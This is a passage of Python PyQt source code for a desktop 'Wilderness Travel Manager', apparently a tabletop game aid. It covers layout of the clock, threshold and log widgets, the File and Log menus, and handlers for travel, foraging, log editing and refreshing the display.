        self.WildernessClockLayout.addWidget(self.WildernessClockMaximumValueDecreaseButton, 3, 2)
        # Threshold controls sit in their own sub-frame under the clock.
        self.WildernessClockThresholdFrame = QFrame()
        self.WildernessClockThresholdLayout = QGridLayout()
        self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdLabel, 0, 0, 1, 3)
        self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdDecreaseButton, 1, 0)
        self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdLineEdit, 1, 1)
        self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdIncreaseButton, 1, 2)
        self.WildernessClockThresholdFrame.setLayout(self.WildernessClockThresholdLayout)
        self.WildernessClockLayout.addWidget(self.WildernessClockThresholdFrame, 4, 0, 1, 3)
        self.WildernessClockLayout.setRowStretch(1, 1)
        self.WildernessClockLayout.setRowStretch(2, 2)
        self.WildernessClockLayout.setRowStretch(3, 1)
        self.WildernessClockFrame.setLayout(self.WildernessClockLayout)
        self.Layout.addWidget(self.WildernessClockFrame, 0, 1)

        # Add Wilderness Log Widgets to Layout
        self.WildernessLogFrame = QFrame()
        self.WildernessLogFrame.setFrameStyle(QFrame.Panel | QFrame.Plain)
        self.WildernessLogLayout = QGridLayout()
        self.WildernessLogLayout.addWidget(self.WildernessLogLabel, 0, 0)
        self.WildernessLogLayout.addWidget(self.WildernessLogTextEdit, 1, 0)
        self.WildernessLogFrame.setLayout(self.WildernessLogLayout)
        self.Layout.addWidget(self.WildernessLogFrame, 0, 2)

        # Set and Configure Layout (log column absorbs extra width)
        self.Layout.setColumnStretch(2, 1)
        self.Frame.setLayout(self.Layout)

        # Create Menu Actions
        self.NewAction = QAction("New")
        self.NewAction.setShortcut("Ctrl+N")
        self.NewAction.triggered.connect(self.NewActionTriggered)
        self.OpenAction = QAction("Open")
        self.OpenAction.setShortcut("Ctrl+O")
        self.OpenAction.triggered.connect(self.OpenActionTriggered)
        self.SaveAction = QAction("Save")
        self.SaveAction.setShortcut("Ctrl+S")
        self.SaveAction.triggered.connect(self.SaveActionTriggered)
        self.SaveAsAction = QAction("Save As")
        self.SaveAsAction.setShortcut("Ctrl+Shift+S")
        self.SaveAsAction.triggered.connect(self.SaveAsActionTriggered)
        self.QuitAction = QAction("Quit")
        self.QuitAction.setShortcut("Ctrl+Q")
        self.QuitAction.triggered.connect(self.close)
        self.AddToLogAction = QAction("Add to Log")
        self.AddToLogAction.triggered.connect(self.AddToLog)
        self.RemoveLastLogEntryAction = QAction("Remove Last Log Entry")
        self.RemoveLastLogEntryAction.triggered.connect(self.RemoveLastLogEntry)
        self.ClearLogAction = QAction("Clear Log")
        self.ClearLogAction.triggered.connect(self.ClearLog)

        # Menu Bar
        self.MenuBar = self.menuBar()
        self.FileMenu = self.MenuBar.addMenu("File")
        self.FileMenu.addAction(self.NewAction)
        self.FileMenu.addAction(self.OpenAction)
        self.FileMenu.addSeparator()
        self.FileMenu.addAction(self.SaveAction)
        self.FileMenu.addAction(self.SaveAsAction)
        self.FileMenu.addSeparator()
        self.FileMenu.addAction(self.QuitAction)
        self.LogMenu = self.MenuBar.addMenu("Log")
        self.LogMenu.addAction(self.AddToLogAction)
        self.LogMenu.addAction(self.RemoveLastLogEntryAction)
        self.LogMenu.addAction(self.ClearLogAction)

    # Modify Values Methods
    def ModifyWildernessClockCurrentValue(self, Delta):
        """Adjust the clock's current value by Delta and mark unsaved changes."""
        self.WildernessTravelManager.ModifyWildernessClockCurrentValue(Delta)
        self.UpdateUnsavedChangesFlag(True)

    def ModifyWildernessClockMaximumValue(self, Delta):
        """Adjust the clock's maximum value by Delta and mark unsaved changes."""
        self.WildernessTravelManager.ModifyWildernessClockMaximumValue(Delta)
        self.UpdateUnsavedChangesFlag(True)

    def ModifyWildernessClockThreshold(self, Delta):
        """Adjust the clock's complication threshold by Delta and mark unsaved changes."""
        self.WildernessTravelManager.ModifyWildernessClockThreshold(Delta)
        self.UpdateUnsavedChangesFlag(True)

    # Travel Action Methods
    def Move(self):
        """Prompt for a travel time (minimum 1) and perform a Move action."""
        TravelTime, OK = QInputDialog.getInt(self, "Travel Time", "Travel time of movement:", 1, 1)
        if OK:
            self.WildernessTravelManager.Move(TravelTime)
            self.UpdateUnsavedChangesFlag(True)

    def Forage(self):
        """Perform a Forage action and mark unsaved changes."""
        self.WildernessTravelManager.Forage()
        self.UpdateUnsavedChangesFlag(True)

    def SpendDays(self):
        """Prompt for a number of days and an activity, then spend the days.

        An empty activity string is passed through as None; nothing happens
        if either dialog is cancelled.
        """
        DaysSpent, DaysSpentOK = QInputDialog.getInt(self, "Spend Days", "Days spent:", 1, 1)
        if DaysSpentOK:
            Activity, ActivityOK = QInputDialog.getText(self, "Activity", "Spent " + str(DaysSpent) + " days...")
            if ActivityOK:
                if Activity == "":
                    Activity = None
                self.WildernessTravelManager.SpendDays(DaysSpent, Activity=Activity, Log=True)
                self.UpdateUnsavedChangesFlag(True)

    # File Menu Action Methods
    def NewActionTriggered(self):
        """Replace the current manager with a fresh one (after New confirmation)."""
        if self.New(self.WildernessTravelManager):
            self.WildernessTravelManager = WildernessTravelManager()
        self.UpdateDisplay()

    def OpenActionTriggered(self):
        """Open a saved manager from disk; keep the current one if cancelled."""
        OpenData = self.Open(self.WildernessTravelManager)
        if OpenData is not None:
            self.WildernessTravelManager = OpenData
        self.UpdateDisplay()

    def SaveActionTriggered(self):
        """Save the current manager to its existing file."""
        self.Save(self.WildernessTravelManager)
        self.UpdateDisplay()

    def SaveAsActionTriggered(self):
        """Save the current manager under a new file name."""
        self.Save(self.WildernessTravelManager, SaveAs=True)
        self.UpdateDisplay()

    # Log Menu Action Methods
    def AddToLog(self):
        """Prompt for a line of text and append it to the wilderness log."""
        LogString, OK = QInputDialog.getText(self, "Add to Log", "Add this to the Wilderness Log:")
        if OK:
            self.WildernessTravelManager.Log(LogString)
            self.UpdateUnsavedChangesFlag(True)

    def RemoveLastLogEntry(self):
        """Remove the most recent log entry after user confirmation."""
        if self.DisplayMessageBox("Are you sure you want to remove the last log entry?  This cannot be undone.", Icon=QMessageBox.Question, Buttons=(QMessageBox.Yes | QMessageBox.No)) == QMessageBox.Yes:
            self.WildernessTravelManager.RemoveLastLogEntry()
            self.UpdateUnsavedChangesFlag(True)

    def ClearLog(self):
        """Clear the whole wilderness log after user confirmation."""
        if self.DisplayMessageBox("Are you sure you want to clear the log?  This cannot be undone.", Icon=QMessageBox.Question, Buttons=(QMessageBox.Yes | QMessageBox.No)) == QMessageBox.Yes:
            self.WildernessTravelManager.ClearLog()
            self.UpdateUnsavedChangesFlag(True)

    # Display Update Methods
    def UpdateDisplay(self):
        """Refresh the clock readouts, the log view, and the window title."""
        # Wilderness Clock Display
        self.WildernessClockCurrentValueLineEdit.setText(str(self.WildernessTravelManager.WildernessClock.Value))
        self.WildernessClockMaximumValueLineEdit.setText(str(self.WildernessTravelManager.WildernessClock.MaximumValue))
        self.WildernessClockThresholdLineEdit.setText(str(self.WildernessTravelManager.WildernessClock.ComplicationThreshold))

        # Wilderness Log Display (newest entry first, "---" separators; the
        # [:-7] slice trims the trailing "\n\n---\n\n" separator)
        WildernessLogString = ""
        for LogEntry in reversed(self.WildernessTravelManager.WildernessLog):
            WildernessLogString += LogEntry + "\n\n---\n\n"
        self.WildernessLogTextEdit.setPlainText(WildernessLogString[:-7])

        # Update Window Title
        self.UpdateWindowTitle()

    def UpdateWindowTitle(self):
        """Compose the title from script name, open file, and unsaved marker."""
        CurrentFileTitleSection = " [" + os.path.basename(self.CurrentOpenFileName) + "]" if self.CurrentOpenFileName != "" else ""
        UnsavedChangesIndicator = " *" if self.UnsavedChanges else ""
        self.setWindowTitle("Wilderness Travel Manager - " + self.ScriptName + CurrentFileTitleSection + UnsavedChangesIndicator)

    def UpdateUnsavedChangesFlag(self, UnsavedChanges):
        """Record whether there are unsaved changes and refresh the display."""
        self.UnsavedChanges = UnsavedChanges
        self.UpdateDisplay()
| 52.241791 | 203 | 0.746186 |